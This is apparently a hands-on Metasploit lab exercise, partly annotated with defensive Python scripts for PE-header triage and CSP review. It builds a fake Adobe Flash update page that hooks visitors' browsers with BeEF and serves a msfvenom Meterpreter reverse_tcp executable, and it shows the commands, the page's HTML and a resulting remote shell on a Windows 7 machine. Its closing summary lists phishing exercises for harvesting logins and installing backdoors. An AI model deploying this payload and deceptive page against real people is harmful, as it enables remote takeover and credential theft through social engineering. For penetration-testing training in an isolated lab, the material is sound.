
metasploit 19. Building a Fake Update Site

[Additional Exercise]

 

Building a Fake Update Site

 

(KaliLinux)

 

Generating the payload to be installed on the client

[TERM1] First terminal

# cd /var/www/html

# msfvenom \
    -p windows/meterpreter/reverse_tcp LHOST=192.168.20.50 LPORT=4444 \
    -f exe \
    -o payload.exe

No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 333 bytes

Saved as: payload.exe

 

# ls

index.html payload.exe

 

# file payload.exe

payload.exe: PE32 executable (GUI) Intel 80386, for MS Windows
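Everything `file` reports above (PE32, GUI subsystem, Intel 80386) is read straight from the executable's DOS, COFF and optional headers. As an added example, not part of the original lab, the following Python header parser reproduces that summary so a dropped binary can be triaged without running it. The two sample images are constructed header-only byte strings, not the lab's payload.exe, and the function names are my own.

```python
import struct

# Subset of IMAGE_FILE_MACHINE_* and IMAGE_SUBSYSTEM_* values from the PE specification.
MACHINES = {0x14C: "Intel 80386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "Aarch64"}
SUBSYSTEMS = {1: "native", 2: "GUI", 3: "console"}
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
IMAGE_FILE_32BIT_MACHINE = 0x0100
IMAGE_FILE_DLL = 0x2000


def describe_pe(data):
    """Walk DOS header -> PE signature -> COFF header -> optional header and
    return the fields that 'file' summarises."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]          # offset of "PE\0\0"
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    machine, nsections, _ts, _symptr, _nsyms, opt_size, characteristics = \
        struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                             # COFF header is 20 bytes
    if opt_size < 70 or len(data) < opt + 70:
        raise ValueError("optional header missing or truncated")
    magic = struct.unpack_from("<H", data, opt)[0]
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)
    if fmt is None:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    # Subsystem sits at offset 68 of the optional header in both PE32 and PE32+.
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    return {
        "format": fmt,
        "machine": MACHINES.get(machine, "unknown (0x%x)" % machine),
        "subsystem": SUBSYSTEMS.get(subsystem, "unknown (%d)" % subsystem),
        "sections": nsections,
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
    }


def file_style_summary(info):
    """Render the dict in the same shape as the file(1) output shown above."""
    kind = "DLL" if info["is_dll"] else "executable"
    return "%s %s (%s) %s, for MS Windows" % (
        info["format"], kind, info["subsystem"], info["machine"])


def build_sample_pe(machine, magic, subsystem, characteristics):
    """Constructed header-only PE image used as sample input; it is not a real program."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                     # e_lfanew -> right after DOS header
    opt_size = 224 if magic == 0x10B else 240
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, opt_size, characteristics)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, magic)
    struct.pack_into("<H", opt, 68, subsystem)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed samples: a 32-bit GUI program (what the lab's msfvenom call produces)
# and a 64-bit console program, to show the parser covers both optional header layouts.
SAMPLE_X86_GUI = build_sample_pe(0x14C, 0x10B, 2, IMAGE_FILE_EXECUTABLE_IMAGE | IMAGE_FILE_32BIT_MACHINE)
SAMPLE_X64_CLI = build_sample_pe(0x8664, 0x20B, 3, IMAGE_FILE_EXECUTABLE_IMAGE)

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_X86_GUI
    print(file_style_summary(describe_pe(data)))
```

Run it with a path argument to inspect a real file; with no argument it describes the constructed 32-bit sample. Note that the machine field alone says what the stager was built for, which is why the lab's Meterpreter later reports x86/win32 on an x64 host.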

 

Running BeEF for browser hooking

 

(Prerequisite) Steps to perform before starting beef-xss

# msfconsole

msf> load msgrpc Pass=abc123

 

# cd /usr/share/beef-xss

# ./beef -x

[17:42:33][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].

[17:42:34][*] Browser Exploitation Framework (BeEF) 0.4.6.1-alpha

[17:42:34] | Twit: @beefproject

[17:42:34] | Site: http://beefproject.com

[17:42:34] | Blog: http://blog.beefproject.com

[17:42:34] |_ Wiki: https://github.com/beefproject/beef/wiki

[17:42:34][*] Project Creator: Wade Alcorn (@WadeAlcorn)

[12:36:56][*] Successful connection with Metasploit.

[12:36:59][*] Loaded 292 Metasploit exploits.

[17:42:34][*] Resetting the database for BeEF.

[17:42:35][*] BeEF is loading. Wait a few seconds...

[17:42:42][*] 13 extensions enabled.

[17:42:42][*] 241 modules enabled.

[17:42:42][*] 3 network interfaces were detected.

[17:42:42][+] running on network interface: 127.0.0.1

[17:42:42] | Hook URL: http://127.0.0.1:3000/hook.js

[17:42:42] |_ UI URL: http://127.0.0.1:3000/ui/panel

[17:42:42][+] running on network interface: 192.168.10.50

[17:42:42] | Hook URL: http://192.168.10.50:3000/hook.js

[17:42:42] |_ UI URL: http://192.168.10.50:3000/ui/panel

[17:42:42][+] running on network interface: 192.168.20.50

[17:42:42] | Hook URL: http://192.168.20.50:3000/hook.js

[17:42:42] |_ UI URL: http://192.168.20.50:3000/ui/panel

[17:42:42][*] RESTful API key: 70eb1ff6c875ee46f110719f26ae0c7014763fea

[17:42:42][*] HTTP Proxy: http://127.0.0.1:6789

[17:42:42][*] DNS Server: 127.0.0.1:5300 (udp)

[17:42:42] | Upstream Server: 8.8.8.8:53 (udp)

[17:42:42] |_ Upstream Server: 8.8.8.8:53 (tcp)

[17:42:42][*] BeEF server started (press control+c to stop)

-> Ignore the error message. (It does not matter for this exercise.)

-> [Note] Error message (how to handle it when the following message appears)

[17:42:34][!] API Fire Error: authentication failed in

{:owner=>BeEF::Extension::Metasploit::API::MetasploitHooks, :id=>12}.post_soft_load()

[TERM2] # msfconsole

msf> load msgrpc Pass=abc123

[TERM1] # cd /usr/share/beef-xss ; ./beef -x

 

Running msfconsole

[TERM1] Second terminal

# msfconsole

msf > use exploit/multi/handler

msf exploit(handler) > show options

 

Module options (exploit/multi/handler):

 

Name Current Setting Required Description

---- --------------- -------- -----------

 

 

Exploit target:

 

Id Name

-- ----

0 Wildcard Target

 

 

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

payload => windows/meterpreter/reverse_tcp

msf exploit(handler) > show options

 

Module options (exploit/multi/handler):

 

Name Current Setting Required Description

---- --------------- -------- -----------

 

 

Payload options (windows/meterpreter/reverse_tcp):

 

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST                      yes       The listen address
LPORT     4444             yes       The listen port

 

 

Exploit target:

 

Id Name

-- ----

0 Wildcard Target

 

msf exploit(handler) > set LHOST 192.168.20.50

LHOST => 192.168.20.50

msf exploit(handler) > show options

 

Module options (exploit/multi/handler):

 

Name Current Setting Required Description

---- --------------- -------- -----------

 

 

Payload options (windows/meterpreter/reverse_tcp):

 

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.20.50    yes       The listen address
LPORT     4444             yes       The listen port

 

 

Exploit target:

 

Id Name

-- ----

0 Wildcard Target

 

msf exploit(handler) > exploit

 

[*] Started reverse handler on 192.168.20.50:4444

[*] Starting the payload handler...

 

Building the fake download site

[TERM3] Third terminal

# vi /var/www/html/index.html

<!DOCTYPE html>
<html>
<head>
<title>Adobe flash</title>
<script src="http://192.168.20.50:3000/hook.js"></script>
</head>
<body><center>
<img src="adobe.jpg" alt="adobe" width="204" height="204">
<p>
<input type="button" name="btnDownload" value="Update" onclick="window.open('payload.exe','download'); return false;"/>
</p>
</center></body>
</html>

 

Create a file /var/www/html/adobe.jpg.

-> Launch firefox, search for "adobe flash player" on www.google.com, find a suitable image, and download it into the /var/www/html directory under the name adobe.jpg. (!!! Mind the file name/extension !!!)

 

# service apache2 restart

# service apache2 status
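The index.html served here pulls hook.js from port 3000 of the same host, which the browser treats as a different origin from the page itself; that cross-origin script is what hooks the browser. As an added example, not part of the original lab, the following Python script lists a page's external scripts, flags cross-origin ones and the well-known BeEF hook path, and shows whether a Content-Security-Policy script-src directive would have stopped the load. The sample HTML is a constructed copy of the lab page, and the simplified CSP matcher and function names are my own.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

DEFAULT_PORTS = {"http": 80, "https": 443}

# Constructed copy of the lab's fake update page (sample input, not fetched from anywhere).
SAMPLE_HTML = """<!DOCTYPE html>
<html><head><title>Adobe flash</title>
<script src="http://192.168.20.50:3000/hook.js"></script>
</head><body><center><img src="adobe.jpg" alt="adobe">
<p><input type="button" value="Update"></p></center></body></html>"""
PAGE_URL = "http://192.168.20.50/index.html"


def origin(url):
    """(scheme, host, port) triple; a missing port resolves to the scheme default."""
    p = urlparse(url)
    return (p.scheme, p.hostname, p.port or DEFAULT_PORTS.get(p.scheme))


class _ScriptCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src)


def find_script_sources(html, page_url):
    """Absolute URLs of all external scripts referenced by the page."""
    c = _ScriptCollector()
    c.feed(html)
    return [urljoin(page_url, s) for s in c.sources]


def csp_allows(script_url, page_url, script_src):
    """Simplified CSP script-src matching (hypothetical helper): 'self', 'none', '*'
    and host-source expressions with optional scheme, port and '*.' prefix.
    Nonces, hashes and 'unsafe-inline' are not modelled."""
    scheme, host, port = origin(script_url)
    host = host or ""
    for expr in script_src:
        if expr == "'none'":
            return False
        if expr == "*":
            return True
        if expr == "'self'":
            if (scheme, host, port) == origin(page_url):
                return True
            continue
        if expr.startswith("'"):
            continue                      # keyword we do not model
        p = urlparse(expr if "://" in expr else "//" + expr)
        if p.scheme and p.scheme != scheme:
            continue
        pattern = p.hostname or ""
        if pattern.startswith("*."):
            if not host.endswith(pattern[1:]):
                continue
        elif pattern != host:
            continue
        # Without an explicit port the expression matches only the scheme's default port,
        # so 'self' or "192.168.20.50" never admit the hook served on port 3000.
        if (p.port if p.port is not None else DEFAULT_PORTS.get(scheme)) != port:
            continue
        return True
    return False


def audit_scripts(page_url, html, script_src=None):
    """One finding per external script: origin mismatch, hook-path match, CSP verdict."""
    findings = []
    page_origin = origin(page_url)
    for src in find_script_sources(html, page_url):
        findings.append({
            "src": src,
            "cross_origin": origin(src) != page_origin,
            "known_hook": urlparse(src).path.endswith("/hook.js"),
            "blocked_by_csp": None if script_src is None else not csp_allows(src, page_url, script_src),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_scripts(PAGE_URL, SAMPLE_HTML, ["'self'"]):
        print(finding)
```

Run against the constructed page with `script-src 'self'`, the single finding is cross-origin, matches the hook path, and would be blocked; allow-listing `http://192.168.20.50:3000` explicitly is the only way the hook gets through, which is the point of reviewing script-src entries rather than defaulting to `*`.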

 

Connecting to BeEF

# firefox http://192.168.20.50:3000/ui/panel &

ID/PASS: beef/beef

 

 

(windows 7)

 

Connect to 192.168.20.50 from the client (Windows 7, Chrome browser)

 

Connect using the Chrome browser.

- http://192.168.20.50

- The browser is then hooked.

 


(KaliLinux)

 

Running Fake Flash Update

 

In the BeEF browser UI

 

Hooked Browsers > Online Browsers > 192.168.20.50 > 192.168.20.202

Commands > Social Engineering > Fake Flash Update >

In the Fake Flash Update fields:

- Image: http://192.168.20.50:3000/adobe/flash_update.png

- Payload: Custom_Payload

- Custom Payload URL: http://192.168.20.50/payload.exe

- Click Execute

 

(windows 7)

Check on Windows

 

Clicking the image automatically downloads the program.

 

Run the downloaded payload.exe.

 


  

(KaliLinux)

 

[TERM1] Second terminal

Running meterpreter

msf exploit(handler) > exploit

 

[*] Started reverse handler on 192.168.20.50:4444

[*] Starting the payload handler...

[*] Sending stage (957487 bytes) to 192.168.20.202

[*] Meterpreter session 1 opened (192.168.20.50:4444 -> 192.168.20.202:49348) at 2015-12-30 18:05:11 +0900

 

meterpreter > sysinfo

Computer : SOLDESK-PC

OS : Windows 7 (Build 7601, Service Pack 1).

Architecture : x64 (Current Process is WOW64)

System Language : ko_KR

Domain : WORKGROUP

Logged On Users : 2

Meterpreter : x86/win32

meterpreter > getuid

Server username: soldesk-PC\soldesk

 

meterpreter >

-> Try running various commands.

 


[Summary]

(Exercise 1) Fake site setup

-> (Purpose) Collect ID/PASS (http://192.168.20.50)


(Exercise 2) Fake site setup

-> (Purpose) Install a malicious program (backdoor) (http://192.168.20.50)


(Exercise 3) Sending a fake email

-> (Purpose) Install a malicious program (backdoor)


(Exercise 4) XSS

-> (Purpose) Install a malicious program (backdoor) (http://192.168.20.50)